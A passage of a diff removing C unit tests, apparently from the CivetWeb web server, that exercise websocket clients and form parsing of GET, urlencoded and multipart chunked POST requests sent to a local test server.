-	ck_assert(!memcmp(ws_client3_data.data, long_ws_buf, long_ws_buf_len_16));
-	free(ws_client3_data.data);
-	ws_client3_data.data = NULL;
-	ws_client3_data.len = 0;
-
-	/* Write long data (64 bit size header) */
-	mg_websocket_client_write(ws_client3_conn,
-	                          WEBSOCKET_OPCODE_BINARY,
-	                          long_ws_buf,
-	                          long_ws_buf_len_64);
-
-	/* Wait for the response */
-	wait_not_null(&(ws_client3_data.data));
-
-	ck_assert_int_eq((int)ws_client3_data.len, (int)long_ws_buf_len_64);
-	ck_assert(!memcmp(ws_client3_data.data, long_ws_buf, long_ws_buf_len_64));
-	free(ws_client3_data.data);
-	ws_client3_data.data = NULL;
-	ws_client3_data.len = 0;
-
-	/* Disconnect client 3 */
-	ck_assert(ws_client3_data.closed == 0);
-	mg_close_connection(ws_client3_conn);
-	ck_assert(ws_client3_data.closed == 1);
-
-	/* Connect client 4 */
-	ws_client4_conn =
-	    mg_connect_websocket_client("localhost",
-#if defined(NO_SSL)
-	                                ipv4_port,
-	                                0,
-#else
-	                                ipv4s_port,
-	                                1,
-#endif
-	                                ebuf,
-	                                sizeof(ebuf),
-	                                "/websocket",
-	                                NULL,
-	                                websocket_client_data_handler,
-	                                websocket_client_close_handler,
-	                                &ws_client4_data);
-
-	ck_assert(ws_client4_conn != NULL);
-
-	wait_not_null(
-	    &(ws_client4_data.data)); /* Wait for the websocket welcome message */
-	ck_assert(ws_client1_data.closed == 1);
-	ck_assert(ws_client2_data.closed == 1);
-	ck_assert(ws_client3_data.closed == 1);
-	ck_assert(ws_client4_data.closed == 0);
-	ck_assert(ws_client4_data.data != NULL);
-	ck_assert(ws_client4_data.len == websocket_welcome_msg_len);
-	ck_assert(!memcmp(ws_client4_data.data,
-	                  websocket_welcome_msg,
-	                  websocket_welcome_msg_len));
-	free(ws_client4_data.data);
-	ws_client4_data.data = NULL;
-	ws_client4_data.len = 0;
-
-/* stop the server without closing this connection */
-
-#endif
-
-	/* Close the server */
-	g_ctx = NULL;
-	test_mg_stop(ctx);
-	mark_point();
-
-#ifdef USE_WEBSOCKET
-	for (i = 0; i < 100; i++) {
-		test_sleep(1);
-		if (ws_client3_data.closed != 0) {
-			mark_point();
-			break;
-		}
-	}
-
-	ck_assert_int_eq(ws_client4_data.closed, 1);
-
-	/* Free data in ws_client4_conn */
-	mg_close_connection(ws_client4_conn);
-
-#endif
-	mark_point();
-}
-END_TEST
-
-
-static int g_field_found_return = -999;
-
-static int
-field_found(const char *key,
-            const char *filename,
-            char *path,
-            size_t pathlen,
-            void *user_data)
-{
-	ck_assert_ptr_ne(key, NULL);
-	ck_assert_ptr_ne(filename, NULL);
-	ck_assert_ptr_ne(path, NULL);
-	ck_assert_uint_gt(pathlen, 128);
-	ck_assert_ptr_eq(user_data, (void *)&g_field_found_return);
-
-	ck_assert((g_field_found_return == FORM_FIELD_STORAGE_GET)
-	          || (g_field_found_return == FORM_FIELD_STORAGE_STORE)
-	          || (g_field_found_return == FORM_FIELD_STORAGE_SKIP)
-	          || (g_field_found_return == FORM_FIELD_STORAGE_ABORT));
-
-	ck_assert_str_ne(key, "dontread");
-
-	if (!strcmp(key, "break_field_handler")) {
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-	if (!strcmp(key, "continue_field_handler")) {
-		return FORM_FIELD_STORAGE_SKIP;
-	}
-
-	if (g_field_found_return == FORM_FIELD_STORAGE_STORE) {
-		strncpy(path, key, pathlen - 8);
-		strcat(path, ".txt");
-	}
-
-	mark_point();
-
-	return g_field_found_return;
-}
-
-
-static int g_field_step;
-
-static int
-field_get(const char *key,
-          const char *value_untruncated,
-          size_t valuelen,
-          void *user_data)
-{
-	/* Copy the untruncated value, so string compare functions can be used. */
-	/* The check unit test library does not have build in memcmp functions. */
-	char *value = (char *)malloc(valuelen + 1);
-	ck_assert(value != NULL);
-	memcpy(value, value_untruncated, valuelen);
-	value[valuelen] = 0;
-
-	ck_assert_ptr_eq(user_data, (void *)&g_field_found_return);
-	ck_assert_int_ge(g_field_step, 0);
-
-	++g_field_step;
-	switch (g_field_step) {
-	case 1:
-		ck_assert_str_eq(key, "textin");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "text");
-		break;
-	case 2:
-		ck_assert_str_eq(key, "passwordin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 3:
-		ck_assert_str_eq(key, "radio1");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "val1");
-		break;
-	case 4:
-		ck_assert_str_eq(key, "radio2");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "val1");
-		break;
-	case 5:
-		ck_assert_str_eq(key, "check1");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "val1");
-		break;
-	case 6:
-		ck_assert_str_eq(key, "numberin");
-		ck_assert_uint_eq(valuelen, 1);
-		ck_assert_str_eq(value, "1");
-		break;
-	case 7:
-		ck_assert_str_eq(key, "datein");
-		ck_assert_uint_eq(valuelen, 8);
-		ck_assert_str_eq(value, "1.1.2016");
-		break;
-	case 8:
-		ck_assert_str_eq(key, "colorin");
-		ck_assert_uint_eq(valuelen, 7);
-		ck_assert_str_eq(value, "#80ff00");
-		break;
-	case 9:
-		ck_assert_str_eq(key, "rangein");
-		ck_assert_uint_eq(valuelen, 1);
-		ck_assert_str_eq(value, "3");
-		break;
-	case 10:
-		ck_assert_str_eq(key, "monthin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 11:
-		ck_assert_str_eq(key, "weekin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 12:
-		ck_assert_str_eq(key, "timein");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 13:
-		ck_assert_str_eq(key, "datetimen");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 14:
-		ck_assert_str_eq(key, "datetimelocalin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 15:
-		ck_assert_str_eq(key, "emailin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 16:
-		ck_assert_str_eq(key, "searchin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 17:
-		ck_assert_str_eq(key, "telin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 18:
-		ck_assert_str_eq(key, "urlin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 19:
-		ck_assert_str_eq(key, "filein");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 20:
-		ck_assert_str_eq(key, "filesin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 21:
-		ck_assert_str_eq(key, "selectin");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "opt1");
-		break;
-	case 22:
-		ck_assert_str_eq(key, "message");
-		ck_assert_uint_eq(valuelen, 23);
-		ck_assert_str_eq(value, "Text area default text.");
-		break;
-	default:
-		ck_abort_msg("field_get called with g_field_step == %i",
-		             (int)g_field_step);
-	}
-
-	free(value);
-	mark_point();
-
-	return 0;
-}
-
-
-static const char *myfile_content = "Content of myfile.txt\r\n";
-static const int myfile_content_rep = 500;
-
-
-static int
-field_store(const char *path, long long file_size, void *user_data)
-{
-	FILE *f;
-	ck_assert_ptr_eq(user_data, (void *)&g_field_found_return);
-	ck_assert_int_ge(g_field_step, 100);
-
-	++g_field_step;
-	switch (g_field_step) {
-	case 101:
-		ck_assert_str_eq(path, "storeme.txt");
-		ck_assert_int_eq(file_size, 9);
-		f = fopen(path, "r");
-		ck_assert_ptr_ne(f, NULL);
-		if (f) {
-			char buf[32] = {0};
-			int i = (int)fread(buf, 1, 31, f);
-			ck_assert_int_eq(i, 9);
-			fclose(f);
-			ck_assert_str_eq(buf, "storetest");
-		}
-		break;
-	case 102:
-		ck_assert_str_eq(path, "file2store.txt");
-		ck_assert_uint_eq(23, strlen(myfile_content));
-		ck_assert_int_eq(file_size, 23 * myfile_content_rep);
-#ifdef _WIN32
-		f = fopen(path, "rb");
-#else
-		f = fopen(path, "r");
-#endif
-		ck_assert_ptr_ne(f, NULL);
-		if (f) {
-			char buf[32] = {0};
-			int r, i;
-			for (r = 0; r < myfile_content_rep; r++) {
-				i = (int)fread(buf, 1, 23, f);
-				ck_assert_int_eq(i, 23);
-				ck_assert_str_eq(buf, myfile_content);
-			}
-			i = (int)fread(buf, 1, 23, f);
-			ck_assert_int_eq(i, 0);
-			fclose(f);
-		}
-		break;
-	default:
-		ck_abort_msg("field_get called with g_field_step == %i",
-		             (int)g_field_step);
-	}
-	mark_point();
-
-	return 0;
-}
-
-
-static int
-FormGet(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *req_info = mg_get_request_info(conn);
-	int ret;
-	struct mg_form_data_handler fdh = {field_found, field_get, NULL, NULL};
-
-	(void)cbdata;
-
-	ck_assert(req_info != NULL);
-
-	mg_printf(conn, "HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n");
-	fdh.user_data = (void *)&g_field_found_return;
-
-	/* Call the form handler */
-	g_field_step = 0;
-	g_field_found_return = FORM_FIELD_STORAGE_GET;
-	ret = mg_handle_form_request(conn, &fdh);
-	g_field_found_return = -888;
-	ck_assert_int_eq(ret, 22);
-	ck_assert_int_eq(g_field_step, 22);
-	mg_printf(conn, "%i\r\n", ret);
-	g_field_step = 1000;
-
-	mark_point();
-
-	return 1;
-}
-
-
-static int
-FormStore(struct mg_connection *conn,
-          void *cbdata,
-          int ret_expected,
-          int field_step_expected)
-{
-	const struct mg_request_info *req_info = mg_get_request_info(conn);
-	int ret;
-	struct mg_form_data_handler fdh = {field_found,
-	                                   field_get,
-	                                   field_store,
-	                                   NULL};
-
-	(void)cbdata;
-
-	ck_assert(req_info != NULL);
-
-	mg_printf(conn, "HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n");
-	fdh.user_data = (void *)&g_field_found_return;
-
-	/* Call the form handler */
-	g_field_step = 100;
-	g_field_found_return = FORM_FIELD_STORAGE_STORE;
-	ret = mg_handle_form_request(conn, &fdh);
-	ck_assert_int_eq(ret, ret_expected);
-	ck_assert_int_eq(g_field_step, field_step_expected);
-	mg_printf(conn, "%i\r\n", ret);
-	g_field_step = 1000;
-
-	mark_point();
-
-	return 1;
-}
-
-
-static int
-FormStore1(struct mg_connection *conn, void *cbdata)
-{
-	mark_point();
-	return FormStore(conn, cbdata, 3, 101);
-}
-
-
-static int
-FormStore2(struct mg_connection *conn, void *cbdata)
-{
-	mark_point();
-	return FormStore(conn, cbdata, 4, 102);
-}
-
-
-static void
-send_chunk_stringl(struct mg_connection *conn,
-                   const char *chunk,
-                   unsigned int chunk_len)
-{
-	char lenbuf[16];
-	size_t lenbuf_len;
-	int ret;
-
-	mark_point();
-
-	/* First store the length information in a text buffer. */
-	sprintf(lenbuf, "%x\r\n", chunk_len);
-	lenbuf_len = strlen(lenbuf);
-
-	/* Then send length information, chunk and terminating \r\n. */
-	ret = mg_write(conn, lenbuf, lenbuf_len);
-	ck_assert_int_eq(ret, (int)lenbuf_len);
-
-	ret = mg_write(conn, chunk, chunk_len);
-	ck_assert_int_eq(ret, (int)chunk_len);
-
-	ret = mg_write(conn, "\r\n", 2);
-	ck_assert_int_eq(ret, 2);
-}
-
-
-static void
-send_chunk_string(struct mg_connection *conn, const char *chunk)
-{
-	mark_point();
-	send_chunk_stringl(conn, chunk, (unsigned int)strlen(chunk));
-	mark_point();
-}
-
-
-START_TEST(test_handle_form)
-{
-	struct mg_context *ctx;
-	struct mg_connection *client_conn;
-	const struct mg_request_info *ri;
-	const char *OPTIONS[8];
-	const char *opt;
-	int opt_idx = 0;
-	char ebuf[100];
-	const char *multipart_body;
-	const char *boundary;
-	size_t body_len, body_sent, chunk_len;
-	int sleep_cnt;
-
-	mark_point();
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8884";
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-	ctx = test_mg_start(NULL, &g_ctx, OPTIONS);
-
-	ck_assert(ctx != NULL);
-	g_ctx = ctx;
-
-	opt = mg_get_option(ctx, "listening_ports");
-	ck_assert_str_eq(opt, "8884");
-
-	mg_set_request_handler(ctx, "/handle_form", FormGet, NULL);
-	mg_set_request_handler(ctx, "/handle_form_store", FormStore1, NULL);
-	mg_set_request_handler(ctx, "/handle_form_store2", FormStore2, NULL);
-
-	test_sleep(1);
-
-	/* Handle form: "GET" */
-	client_conn = mg_download("localhost",
-	                          8884,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /handle_form"
-	                          "?textin=text&passwordin=&radio1=val1"
-	                          "&radio2=val1&check1=val1&numberin=1"
-	                          "&datein=1.1.2016&colorin=%2380ff00"
-	                          "&rangein=3&monthin=&weekin=&timein="
-	                          "&datetimen=&datetimelocalin=&emailin="
-	                          "&searchin=&telin=&urlin=&filein="
-	                          "&filesin=&selectin=opt1"
-	                          "&message=Text+area+default+text. "
-	                          "HTTP/1.0\r\n"
-	                          "Host: localhost:8884\r\n"
-	                          "Connection: close\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST x-www-form-urlencoded" */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form HTTP/1.1\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: application/x-www-form-urlencoded\r\n"
-	                "Content-Length: 263\r\n"
-	                "\r\n"
-	                "textin=text&passwordin=&radio1=val1&radio2=val1"
-	                "&check1=val1&numberin=1&datein=1.1.2016"
-	                "&colorin=%2380ff00&rangein=3&monthin=&weekin="
-	                "&timein=&datetimen=&datetimelocalin=&emailin="
-	                "&searchin=&telin=&urlin=&filein=&filesin="
-	                "&selectin=opt1&message=Text+area+default+text.");
-	ck_assert(client_conn != NULL);
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST multipart/form-data" */
-	multipart_body =
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"textin\"\r\n"
-	    "\r\n"
-	    "text\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"passwordin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"radio1\"\r\n"
-	    "\r\n"
-	    "val1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=radio2\r\n"
-	    "\r\n"
-	    "val1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"check1\"\r\n"
-	    "\r\n"
-	    "val1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"numberin\"\r\n"
-	    "\r\n"
-	    "1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"datein\"\r\n"
-	    "\r\n"
-	    "1.1.2016\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"colorin\"\r\n"
-	    "\r\n"
-	    "#80ff00\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"rangein\"\r\n"
-	    "\r\n"
-	    "3\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"monthin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"weekin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"timein\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"datetimen\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"datetimelocalin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"emailin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"searchin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"telin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"urlin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"filein\"; filename=\"\"\r\n"
-	    "Content-Type: application/octet-stream\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=filesin; filename=\r\n"
-	    "Content-Type: application/octet-stream\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"selectin\"\r\n"
-	    "\r\n"
-	    "opt1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"message\"\r\n"
-	    "\r\n"
-	    "Text area default text.\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388--\r\n";
-	body_len = strlen(multipart_body);
-	ck_assert_uint_eq(body_len, 2368); /* not required */
-
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "POST /handle_form HTTP/1.1\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Content-Length: %u\r\n"
-	                "\r\n%s",
-	                (unsigned int)body_len,
-	                multipart_body);
-
-	ck_assert(client_conn != NULL);
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Handle form: "POST multipart/form-data" with chunked transfer encoding */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form HTTP/1.1\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-
-	ck_assert(client_conn != NULL);
-
-	body_len = strlen(multipart_body);
-	chunk_len = 1;
-	body_sent = 0;
-	while (body_len > body_sent) {
-		if (chunk_len > (body_len - body_sent)) {
-			chunk_len = body_len - body_sent;
-		}
-		ck_assert_int_gt((int)chunk_len, 0);
-		mg_printf(client_conn, "%x\r\n", (unsigned int)chunk_len);
-		mg_write(client_conn, multipart_body + body_sent, chunk_len);
-		mg_printf(client_conn, "\r\n");
-		body_sent += chunk_len;
-		chunk_len = (chunk_len % 40) + 1;
-	}
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST multipart/form-data" with chunked transfer
-	 * encoding, using a quoted boundary string */
-	client_conn = mg_download(
-	    "localhost",
-	    8884,
-	    0,
-	    ebuf,
-	    sizeof(ebuf),
-	    "%s",
-	    "POST /handle_form HTTP/1.1\r\n"
-	    "Host: localhost:8884\r\n"
-	    "Connection: close\r\n"
-	    "Content-Type: multipart/form-data; "
-	    "boundary=\"multipart-form-data-boundary--see-RFC-2388\"\r\n"
-	    "Transfer-Encoding: chunked\r\n"
-	    "\r\n");
-
-	ck_assert(client_conn != NULL);
-
-	body_len = strlen(multipart_body);
-	chunk_len = 1;
-	body_sent = 0;
-	while (body_len > body_sent) {
-		if (chunk_len > (body_len - body_sent)) {
-			chunk_len = body_len - body_sent;
-		}
-		ck_assert_int_gt((int)chunk_len, 0);
-		mg_printf(client_conn, "%x\r\n", (unsigned int)chunk_len);
-		mg_write(client_conn, multipart_body + body_sent, chunk_len);
-		mg_printf(client_conn, "\r\n");
-		body_sent += chunk_len;
-		chunk_len = (chunk_len % 40) + 1;
-	}
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Now test form_store */
-
-	/* First test with GET */
-	client_conn = mg_download("localhost",
-	                          8884,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /handle_form_store"
-	                          "?storeme=storetest"
-	                          "&continue_field_handler=ignore"
-	                          "&break_field_handler=abort"
-	                          "&dontread=xyz "
-	                          "HTTP/1.0\r\n"
-	                          "Host: localhost:8884\r\n"
-	                          "Connection: close\r\n\r\n");
-
-	ck_assert(client_conn != NULL);
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Handle form: "POST x-www-form-urlencoded", chunked, store */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form_store HTTP/1.0\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: application/x-www-form-urlencoded\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-	ck_assert(client_conn != NULL);
-
-	send_chunk_string(client_conn, "storeme=store");
-	send_chunk_string(client_conn, "test&");
-	send_chunk_string(client_conn, "continue_field_handler=ignore");
-	send_chunk_string(client_conn, "&br");
-	test_sleep(1);
-	send_chunk_string(client_conn, "eak_field_handler=abort&");
-	send_chunk_string(client_conn, "dontread=xyz");
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST multipart/form-data", chunked, store */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form_store HTTP/1.0\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-	ck_assert(client_conn != NULL);
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary");
-	send_chunk_string(client_conn, "--see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"storeme\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "storetest\r\n");
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary-");
-	send_chunk_string(client_conn, "-see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"continue_field_handler\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "ignore\r\n");
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary-");
-	send_chunk_string(client_conn, "-see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"break_field_handler\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "abort\r\n");
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary-");
-	send_chunk_string(client_conn, "-see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"dontread\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "xyz\r\n");
-	send_chunk_string(client_conn, "--multipart-form-data-boundary");
-	send_chunk_string(client_conn, "--see-RFC-2388--\r\n");
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Handle form: "POST multipart/form-data", chunked, store, with files */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form_store2 HTTP/1.0\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-	ck_assert(client_conn != NULL);
-
-	boundary = "--multipart-form-data-boundary--see-RFC-2388\r\n";
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"storeme\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "storetest\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"continue_field_handler\";");
-	send_chunk_string(client_conn, "filename=\"file_ignored.txt\"\r\n");
-	send_chunk_string(client_conn, "Content-Type: ");
-	send_chunk_string(client_conn, "application/octet-stream\r\n");
-	send_chunk_string(client_conn, "X-Ignored-Header: xyz\r\n");
-	send_chunk_string(client_conn, "\r\n");
-
-	/* send some kilobyte of data */
-	/* sending megabytes to localhost does not allways work in CI test
-	 * environments (depending on the network stack) */
-	body_sent = 0;
-	do {
-		send_chunk_string(client_conn, "ignore\r\n");
-		body_sent += 8;
-		/* send some strings that are almost boundaries */
-		for (chunk_len = 1; chunk_len < strlen(boundary); chunk_len++) {
-			/* chunks from 1 byte to strlen(boundary)-1 */
-			send_chunk_stringl(client_conn, boundary, (unsigned int)chunk_len);
-			body_sent += chunk_len;
-		}
-	} while (body_sent < 8 * 1024);
-	send_chunk_string(client_conn, "\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"file2store\";");
-	send_chunk_string(client_conn, "filename=\"myfile.txt\"\r\n");
-	send_chunk_string(client_conn, "Content-Type: ");
-	send_chunk_string(client_conn, "application/octet-stream\r\n");
-	send_chunk_string(client_conn, "X-Ignored-Header: xyz\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	for (body_sent = 0; (int)body_sent < (int)myfile_content_rep; body_sent++) {
-		send_chunk_string(client_conn, myfile_content);
-	}
